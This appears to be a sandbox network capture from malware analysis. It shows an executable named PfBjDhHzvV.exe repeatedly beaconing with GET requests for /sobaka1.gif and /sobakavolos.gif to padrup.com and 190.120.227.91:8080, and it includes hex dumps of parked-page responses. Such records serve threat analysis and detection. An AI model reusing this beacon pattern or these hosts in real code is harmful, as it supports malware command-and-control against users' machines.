                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:54.130867004 CEST155OUTGET /sobaka1.gif?4b65019=711512289 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191478968 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:38:55 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_fxvyEBetksA0OKlNhOfGCv6e3RlB4kIclgiOeidZaP/osfXKOROy319sd+74m8ySUidaSFAdFumZorPFh9WrSw==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 31 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 1e0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191603899 CEST203INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzEzNC44NTE2Ojc2YmVhZDAzYzg2N2VhYzkyM2U3OTc5YWE1MjkwZTMyMmNmNTZmMjdlMWRhNzI2MDQ2
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191613913 CEST1236INData Raw: 36 66 39 0d 0a 4d 47 45 7a 5a 47 51 77 4e 32 55 79 4f 44 41 32 59 7a 63 36 4e 6a 63 78 4d 6a 45 77 4f 47 56 6a 5a 6d 56 69 4d 67 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65
                                                                                                                                                                                                                                  Data Ascii: 6f9MGEzZGQwN2UyODA2Yzc6NjcxMjEwOGVjZmViMg==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scr
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.191909075 CEST561INData Raw: 74 68 65 20 72 65 71 75 65 73 74 2e 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73
                                                                                                                                                                                                                                  Data Ascii: the request.'); } } } xhr.open('GET', path + '/ls.p' + 'hp?t=6712108f&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '25dcb738128b3d52575e5fb7d6f2d1dddc46d8b1');</scr


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  15192.168.2.762459190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:55.212109089 CEST168OUTGET /sobakavolos.gif?4d57b0b=162199062 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  16192.168.2.762487185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:38:59.426867008 CEST155OUTGET /sobaka1.gif?568bd78=635252296 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.499979973 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:39:00 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_gbAMxxk61XTGR2W62W0jrFfJfua33oi7qp0rfgCrauE5jadmhPBKN/20gSUBmmK2l/NtZtrG9rv5zXIzjzcjsQ==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 31 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 1eb<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.500058889 CEST214INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE0MC4xNjc6MjI0ZGI4NzNkMjczNjRiMjVlYjc2OTRmMTQ0MzQwODVhMjQ0MDJhYmEzOTJlZGE4ZTA2MzczNzQ0Y2I
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.500077009 CEST1236INData Raw: 36 65 61 0d 0a 7a 59 7a 45 30 4d 54 6f 32 4e 7a 45 79 4d 54 41 35 4e 44 49 34 59 7a 4a 6a 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61
                                                                                                                                                                                                                                  Data Ascii: 6eazYzE0MTo2NzEyMTA5NDI4YzJj';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.500366926 CEST546INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31
                                                                                                                                                                                                                                  Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67121094&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '8882c916bfdd7be295e5032498290b32c985989d');</script><script


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  17192.168.2.762493190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:00.539690971 CEST168OUTGET /sobakavolos.gif?588b379=464224605 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  18192.168.2.762510185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:05.683607101 CEST156OUTGET /sobaka1.gif?617d87e=1022260460 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749342918 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:39:06 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_SZnlX2/fiCa+BhJAmL9+s1jQxIkM26NlWeQDU57V4DypYoXU8Me9HnyLP0RlYkhRZN4qsESRNZiUHWdRiyWilQ==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749372959 CEST224INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE0Ni40MDk4OmY5YzM3NmNlN2RjMWJmNmY0MjdiNDI1MmE1MDQ4MjlkOTI3OGQxMjQyOWFmNjM2NjU3ZGI5MzRmZjg2YTYzOTk6Njc
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749383926 CEST1236INData Raw: 78 4d 6a 45 77 4f 57 45 32 4e 44 42 6c 59 67 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
                                                                                                                                                                                                                                  Data Ascii: xMjEwOWE2NDBlYg==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.749485970 CEST540INData Raw: 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 31 30 39 61 26 74 6f 6b 65 6e 3d 27
                                                                                                                                                                                                                                  Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=6712109a&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, 'da4d0ca821e579c737fa36ca259949335146f3ef473');</script><script type='


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  19192.168.2.762512190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:06.780811071 CEST168OUTGET /sobakavolos.gif?653dba7=849272120 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  20192.168.2.762513185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:11.041985035 CEST155OUTGET /sobaka1.gif?6eac3db=348146577 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: padrup.com
                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134852886 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Date: Fri, 18 Oct 2024 07:39:12 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  X-Redirect: skenzo
                                                                                                                                                                                                                                  X-Buckets: bucket102
                                                                                                                                                                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_aDQVyP6ZGPTxG2i4uSftzoh8tTh7XQF6YiPjNo45ba7c/MbgtnfRKxt1vNI5trLVE6YvqyQvHR8wpVWkUZLcIA==
                                                                                                                                                                                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                  X-Language: english
                                                                                                                                                                                                                                  Accept-CH: viewport-width
                                                                                                                                                                                                                                  Accept-CH: dpr
                                                                                                                                                                                                                                  Accept-CH: device-memory
                                                                                                                                                                                                                                  Accept-CH: rtt
                                                                                                                                                                                                                                  Accept-CH: downlink
                                                                                                                                                                                                                                  Accept-CH: ect
                                                                                                                                                                                                                                  Accept-CH: ua
                                                                                                                                                                                                                                  Accept-CH: ua-full-version
                                                                                                                                                                                                                                  Accept-CH: ua-platform
                                                                                                                                                                                                                                  Accept-CH: ua-platform-version
                                                                                                                                                                                                                                  Accept-CH: ua-arch
                                                                                                                                                                                                                                  Accept-CH: ua-model
                                                                                                                                                                                                                                  Accept-CH: ua-mobile
                                                                                                                                                                                                                                  Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                  X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                  X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                  X-Domain: padrup.com
                                                                                                                                                                                                                                  X-Subdomain:
                                                                                                                                                                                                                                  Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                  Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134888887 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                  Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTIzNzE1MS43ODM4OmJlNTJhYzcxZmZmZGMwYTQwMzRlNjAxNGFkZGU2YjNlMTMyOGUyNGRlODBhMmY3ZDQyZTQyMWRjZDg3MDFlMjQ6NjcxMjEwOWZiZjU4ZQ==';
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.134905100 CEST424INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                  Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.135001898 CEST340INData Raw: 0d 0a 31 34 36 0d 0a 62 31 64 64 64 38 30 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
                                                                                                                                                                                                                                  Data Ascii: 146b1ddd80');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  21192.168.2.762514190.120.227.9180807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:12.170757055 CEST168OUTGET /sobakavolos.gif?70c2488=591181480 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                  Host: 190.120.227.91:8080
                                                                                                                                                                                                                                  Cache-Control: no-cache


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  22192.168.2.762516185.53.178.50807272C:\Users\user\Desktop\PfBjDhHzvV.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  Oct 18, 2024 09:39:16.443428040 CEST155OUTGET /sobaka1.gif?7a93601=771179526 HTTP/1.1
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
